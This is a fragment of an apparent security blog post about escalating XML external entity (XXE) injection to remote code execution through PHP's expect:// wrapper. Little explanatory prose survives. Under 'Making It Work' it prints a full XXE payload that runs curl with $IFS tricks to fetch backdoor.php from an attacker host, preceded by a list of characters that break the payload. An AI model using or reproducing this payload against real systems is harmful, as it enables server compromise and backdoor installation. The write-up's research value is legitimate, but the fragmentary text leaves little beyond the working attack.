From XXE to RCE with PHP/expect — The Missing Link

DOMDocument::loadXML(): Invalid URI: expect://echo BLAH in Entity, line: 2

What I Found

" - double quotes
{ } - curly braces
| - "pipe"
\ - backslash
< > - angle brackets
: - colon
' - single quote
; - semicolon
( ) - brackets
$ - dollar sign

Making It Work

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'1.3.3.7:8000/backdoor.php'">
]>
<root>
<name>Joe</name>
<tel>ufgh</tel>
<email>START_&file;_END</email>
<password>kjh</password>
</root>

--

--

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store